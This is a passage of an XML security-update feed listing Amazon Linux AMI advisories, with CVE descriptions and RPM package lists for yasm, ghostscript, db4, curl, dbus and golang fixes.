arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.27.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-common-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-ad-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1724</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1724: medium priority package update for yasm</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33459:
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in nasm_parser_directive() in modules/parsers/nasm/nasm-parse.c.
CVE-2021-33454:
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr_get_intnum() in libyasm/expr.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33454" title="" id="CVE-2021-33454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33459" title="" id="CVE-2021-33459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yasm-devel" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-devel-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm-debuginfo" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-debuginfo-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm-devel" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-devel-1.2.0-1.5.amzn1.i686.rpm</filename></package><package name="yasm" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-1.2.0-1.5.amzn1.i686.rpm</filename></package><package name="yasm-debuginfo" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-debuginfo-1.2.0-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1725</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1725: important priority package update for ghostscript</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-27792:
A heap-based buffer overwrite vulnerability was found in GhostScript's lp8000_print_page() function in gdevlp8k.c file. An attacker could trick a user to open a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27792" title="" id="CVE-2020-27792" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1726</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1726: important priority package update for db4</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10140:
Postfix before 2.11.10, 3.0.x before 3.0.10, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 might allow local users to gain privileges by leveraging undocumented functionality in Berkeley DB 2.x and later, related to reading settings from DB_CONFIG in the current directory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10140" title="" id="CVE-2017-10140" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="db4-devel-static" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-devel-static-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-utils" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-utils-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-devel" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-devel-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-debuginfo" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-debuginfo-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-tcl" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-tcl-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-java" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-java-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-cxx" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-cxx-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-debuginfo" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-debuginfo-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-cxx" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-cxx-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4" version="4.7.25" release="22.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/db4-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-devel-static" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-devel-static-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-utils" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-utils-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-devel" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-devel-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-tcl" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-tcl-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-java" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-java-4.7.25-22.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1727</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1727: medium priority package update for curl</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27536:
The curl advisory describes this issue as follows:
libcurl would reuse a previously created connection even when the GSS delegation (CURLOPT_GSSAPI_DELEGATION) option had been changed that could have changed the user's permissions in a second transfer.
libcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, this GSS delegation setting was left out from the configuration match checks, making them match too easily, affecting krb5/kerberos/negotiate/GSSAPI transfers.
CVE-2023-27535:
The curl advisory describes this issue as follows:
libcurl would reuse a previously created FTP connection even when one or more options had been changed that could have made the effective user a very different one, thus leading to doing the second transfer with wrong credentials.
CVE-2023-27533:
The curl advisory describes this issue as follows:
curl supports communicating using the TELNET protocol and as a part of this it offers users to pass on user name and "telnet options" for the server negotiation.
Due to lack of proper input scrubbing and without it being the documented functionality, curl would pass on user name and telnet options to the server as provided. This could allow users to pass in carefully crafted content that pass on content or do option negotiation without the application intending to do so. In particular if an application for example allows users to provide the data or parts of the data.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27533" title="" id="CVE-2023-27533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27535" title="" id="CVE-2023-27535" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27536" title="" id="CVE-2023-27536" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.105.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1729</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1729: medium priority package update for curl</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27534:
The curl advisory describes this issue as follows:
curl supports SFTP transfers. curl's SFTP implementation offers a special feature in the path component of URLs: a tilde (~) character as the first path element in the path denotes a path relative to the user's home directory. This is supported because of wording in the once proposed to-become RFC draft that was to dictate how SFTP URLs work.
Due to a bug, the handling of the tilde in SFTP path did however not only replace it when it is used stand-alone as the first path element but also wrongly when used as a mere prefix in the first element.
Using a path like /~2/foo when accessing a server using the user dan (with home directory /home/dan) would then quite surprisingly access the file /home/dan2/foo.
This can be taken advantage of to circumvent filtering or worse.
CVE-2023-23916:
curl: HTTP multi-header compression denial of service
CVE-2022-43552:
A vulnerability was found in curl. In this issue, curl can be asked to tunnel virtually all protocols it supports through an HTTP proxy. HTTP proxies can deny these tunnel operations using an appropriate HTTP error response code. When getting denied to tunnel the specific SMB or TELNET protocols, curl can use a heap-allocated struct after it has been freed and shut down the code path in its transfer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43552" title="" id="CVE-2022-43552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23916" title="" id="CVE-2023-23916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27534" title="" id="CVE-2023-27534" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.104.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1730</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1730: medium priority package update for dbus</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42012:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.
CVE-2022-42011:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type.
CVE-2022-42010:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42010" title="" id="CVE-2022-42010" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42011" title="" id="CVE-2022-42011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42012" title="" id="CVE-2022-42012" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dbus" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-doc" version="1.6.12" release="14.31.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.6.12-14.31.amzn1.noarch.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.31.amzn1" epoch="1" 
arch="i686"><filename>Packages/dbus-debuginfo-1.6.12-14.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1731</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1731: important priority package update for golang</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24538:
Templates did not properly consider backticks (`) as Javascript string delimiters, and as such did not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contained a Go template action within a Javascript template literal, the contents of the action could be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
CVE-2023-24537:
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.
CVE-2023-24536:
Multipart form parsing can consume large amounts of CPU and memory when processing form inputs containing very large numbers of parts. This stems from several causes: 1. mime/multipart.Reader.ReadForm limits the total memory a parsed multipart form can consume. ReadForm can undercount the amount of memory consumed, leading it to accept larger inputs than intended. 2. Limiting total memory does not account for increased pressure on the garbage collector from large numbers of small allocations in forms with many parts. 3. ReadForm can allocate a large number of short-lived buffers, further increasing pressure on the garbage collector. The combination of these factors can permit an attacker to cause a program that parses multipart forms to consume large amounts of CPU and memory, potentially resulting in a denial of service. This affects programs that use mime/multipart.Reader.ReadForm, as well as form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue. With fix, ReadForm now does a better job of estimating the memory consumption of parsed forms, and performs many fewer short-lived allocations. In addition, the fixed mime/multipart.Reader imposes the following limits on the size of parsed forms: 1. Forms parsed with ReadForm may contain no more than 1000 parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxparts=. 2. Form parts parsed with NextPart and NextRawPart may contain no more than 10,000 header fields. In addition, forms parsed with ReadForm may contain no more than 10,000 header fields across all parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxheaders=.
CVE-2023-24534:
HTTP and MIME header parsing could allocate large amounts of memory, even when parsing small inputs.
Certain unusual patterns of input data could cause the common function used to parse HTTP and MIME headers to allocate substantially more memory than required to hold the parsed headers. An attacker can exploit this behavior to cause an HTTP server to allocate large amounts of memory from a small request, potentially leading to memory exhaustion and a denial of service.
CVE-2023-24532:
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve). This does not impact usages of crypto/ecdsa or crypto/ecdh.
CVE-2022-41725:
Golang: net/http, mime/multipart: denial of service from excessive resource consumption (https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E)
CVE-2022-41724:
RESERVED
NOTE: https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
CVE-2022-41722:
The Go project has described this issue as follows:
"On Windows, the filepath.Clean function could transform an invalid path such as a/../c:/b into the valid path c:\b. This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. The filepath.Clean function will now transform this path into the relative (but still invalid) path .\c:\b."
CVE-2022-41717:
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
CVE-2022-32189:
An uncontrolled resource consumption flaw was found in Golang math/big. A too-short encoded message can cause a panic in Float.GobDecode and Rat.GobDecode in math/big in Go, potentially allowing an attacker to create a denial of service, impacting availability.
CVE-2022-30634:
Infinite loop in Read in crypto/rand before Go 1.17.11 and Go 1.18.3 on Windows allows attacker to cause an indefinite hang by passing a buffer larger than 1 << 32 - 1 bytes.
CVE-2022-30580:
Code injection in Cmd.Start in os/exec before Go 1.17.11 and Go 1.18.3 allows execution of any binaries in the working directory named either "..com" or "..exe" by calling Cmd.Run, Cmd.Start, Cmd.Output, or Cmd.CombinedOutput when Cmd.Path is unset.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30580" title="" id="CVE-2022-30580" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30634" title="" id="CVE-2022-30634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189" title="" id="CVE-2022-32189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717" title="" id="CVE-2022-41717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41722" title="" id="CVE-2022-41722" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41724" title="" id="CVE-2022-41724" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41725" title="" id="CVE-2022-41725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24532" title="" id="CVE-2023-24532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24534" title="" id="CVE-2023-24534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24536" title="" id="CVE-2023-24536" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24537" title="" id="CVE-2023-24537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.43.amzn1" epoch="0" 
